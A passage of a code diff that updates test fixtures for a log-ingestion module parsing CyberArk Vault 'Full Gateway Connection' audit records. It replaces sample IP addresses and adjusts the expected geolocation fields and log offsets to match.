+<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
+<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"216.160.83.61","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
 <5>1 2021-03-10T08:31:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:31:50","IsoTimestamp":"2021-03-10T08:31:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"PasswordManager","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
 <5>1 2021-03-10T22:37:00Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:37:00","IsoTimestamp":"2021-03-10T22:37:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"10.0.1.10","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-11T17:38:05Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:05</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:05Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PSMPGW_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:05","IsoTimestamp":"2021-03-11T17:38:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.32.170.205"}}}
-<5>1 2021-03-11T17:48:22Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:22</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:22Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PSMPGW_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:22","IsoTimestamp":"2021-03-11T17:48:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.32.170.205"}}}
-<5>1 2021-03-11T18:02:57Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 10:02:57</Timestamp>\n    <IsoTimestamp>2021-03-11T18:02:57Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PVWAGWUser</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>35.192.121.42</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:02:57","IsoTimestamp":"2021-03-11T18:02:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:35</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:35Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PSMPGW_SSH</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"34.71.250.247"}}}
+<5>1 2021-03-11T17:38:05Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:05</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:05Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PSMPGW_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:05","IsoTimestamp":"2021-03-11T17:38:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.14"}}}
+<5>1 2021-03-11T17:48:22Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:22</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:22Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PSMPGW_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:22","IsoTimestamp":"2021-03-11T17:48:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.14"}}}
+<5>1 2021-03-11T18:02:57Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 10:02:57</Timestamp>\n    <IsoTimestamp>2021-03-11T18:02:57Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PVWAGWUser</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.12</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:02:57","IsoTimestamp":"2021-03-11T18:02:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
+<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:35</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:35Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PSMPGW_SSH</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.2.69.143"}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log-expected.json
index ceda7e9f02bf..34016e02435d 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log-expected.json
@@ -68,7 +68,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PVWAGWUser",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 09 00:32:51",
         "destination.address": "10.0.1.20",
         "destination.ip": "10.0.1.20",
@@ -99,23 +99,20 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "PVWAGWUser"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "PVWAGWUser",
         "tags": [
             "cyberarkpas.audit",
@@ -134,7 +131,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PVWAGWUser",
-        "cyberarkpas.audit.station": "37.223.7.45",
+        "cyberarkpas.audit.station": "216.160.83.61",
         "cyberarkpas.audit.timestamp": "Mar 09 02:14:58",
         "destination.address": "10.0.1.20",
         "destination.ip": "10.0.1.20",
@@ -156,7 +153,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1226,
+        "log.offset": 1225,
         "log.syslog.priority": "5",
         "network.direction": "inbound",
         "observer.hostname": "VAULT",
@@ -165,23 +162,23 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "37.223.7.45"
+            "216.160.83.61"
         ],
         "related.user": [
             "Administrator",
             "PVWAGWUser"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "37.223.7.45",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "37.223.7.45",
+        "source.address": "216.160.83.61",
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.61",
         "source.user.name": "PVWAGWUser",
         "tags": [
             "cyberarkpas.audit",
@@ -222,7 +219,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1839,
+        "log.offset": 1840,
         "log.syslog.priority": "5",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -279,7 +276,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2452,
+        "log.offset": 2453,
         "log.syslog.priority": "5",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -308,26 +305,23 @@
         "@timestamp": "2021-03-11T17:38:05.000Z",
         "cyberarkpas.audit.action": "Full Gateway Connection",
         "cyberarkpas.audit.desc": "Full Gateway Connection",
-        "cyberarkpas.audit.gateway_station": "81.32.170.205",
+        "cyberarkpas.audit.gateway_station": "67.43.156.14",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:05Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Full Gateway Connection",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:05</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:05Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PSMPGW_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:05</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:05Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PSMPGW_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMPGW_VAGRANT",
         "cyberarkpas.audit.station": "127.0.0.1",
         "cyberarkpas.audit.timestamp": "Mar 11 09:38:05",
-        "destination.address": "81.32.170.205",
-        "destination.geo.city_name": "Barcelona",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "ES",
-        "destination.geo.country_name": "Spain",
-        "destination.geo.location.lat": 41.3891,
-        "destination.geo.location.lon": 2.1611,
-        "destination.geo.region_iso_code": "ES-B",
-        "destination.geo.region_name": "Barcelona",
-        "destination.ip": "81.32.170.205",
+        "destination.address": "67.43.156.14",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.14",
         "destination.user.name": "Administrator",
         "event.action": "full gateway connection",
         "event.category": [
@@ -346,7 +340,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3063,
+        "log.offset": 3064,
         "log.syslog.priority": "5",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -355,7 +349,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "127.0.0.1",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -375,26 +369,23 @@
         "@timestamp": "2021-03-11T17:48:22.000Z",
         "cyberarkpas.audit.action": "Full Gateway Connection",
         "cyberarkpas.audit.desc": "Full Gateway Connection",
-        "cyberarkpas.audit.gateway_station": "81.32.170.205",
+        "cyberarkpas.audit.gateway_station": "67.43.156.14",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:48:22Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Full Gateway Connection",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:22</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:22Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PSMPGW_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:22</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:22Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PSMPGW_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMPGW_VAGRANT",
         "cyberarkpas.audit.station": "10.0.2.2",
         "cyberarkpas.audit.timestamp": "Mar 11 09:48:22",
-        "destination.address": "81.32.170.205",
-        "destination.geo.city_name": "Barcelona",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "ES",
-        "destination.geo.country_name": "Spain",
-        "destination.geo.location.lat": 41.3891,
-        "destination.geo.location.lon": 2.1611,
-        "destination.geo.region_iso_code": "ES-B",
-        "destination.geo.region_name": "Barcelona",
-        "destination.ip": "81.32.170.205",
+        "destination.address": "67.43.156.14",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.14",
         "destination.user.name": "Administrator",
         "event.action": "full gateway connection",
         "event.category": [
@@ -413,7 +404,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4581,
+        "log.offset": 4580,
         "log.syslog.priority": "5",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -422,7 +413,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.2.2",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -446,11 +437,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T18:02:57Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Full Gateway Connection",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 10:02:57</Timestamp>\n    <IsoTimestamp>2021-03-11T18:02:57Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PVWAGWUser</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>35.192.121.42</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 10:02:57</Timestamp>\n    <IsoTimestamp>2021-03-11T18:02:57Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PVWAGWUser</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.12</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PVWAGWUser",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
